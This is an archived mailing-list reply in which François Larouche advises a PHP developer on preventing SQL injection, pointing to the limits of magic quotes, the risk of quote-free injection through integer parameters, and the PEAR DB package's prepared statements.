RE: Blind SQL Injection / Stored procedures

["LAROUCHE Francois" <Francois.Larouche () accorservices com>]

Hi phillip,

The first thing I can tell on PHP since I don't much about it, is the use of the magic quotes option. You should find 
valuable information on this topic on google. However you have to know that there are some problems with it. Read it 
carefully.

Now the problem with PHP is that under the version 5 (not sure at 100%) there is nothing that prevents SQL injection 
since the SQL is inline in the code. Even with magic quotes it's dangerous since you can achieve SQL injection without 
a single quote (when there is an integer argument for instance).

There is another option that I found was a database abstraction layer package made by PEAR, it works on PHP 4 and 5 and 
should be free (pear.php.net/package/DB). Now I don't know if it's a good product or not, or really secure but you can 
always try. I just know they use their own prepared statement and quote stripping.

Good luck!

François Larouche

P.S. It's not a good idea to talk openly of your architecture on the net, not all people in this list are pure of heart 
:) Nasa is a attractive place...

______________________________________________________________________________________________________________________________
This email, the information contained within and any files transmitted with it (herein after referred as "the message")
are confidential. It is intended solely for the addressees and access to this message by any other person is not 
permitted.
If you are not the named addressee, please send it back immediately to the sender and delete it. Unauthorized 
disclosure,
publication, use, dissemination, forwarding, printing or copying of this message, either in whole or in part, is 
strictly
prohibited.
Emails are susceptible to alteration and their integrity cannot be guaranteed. Our company shall not be liable for this
message if modified or falsified.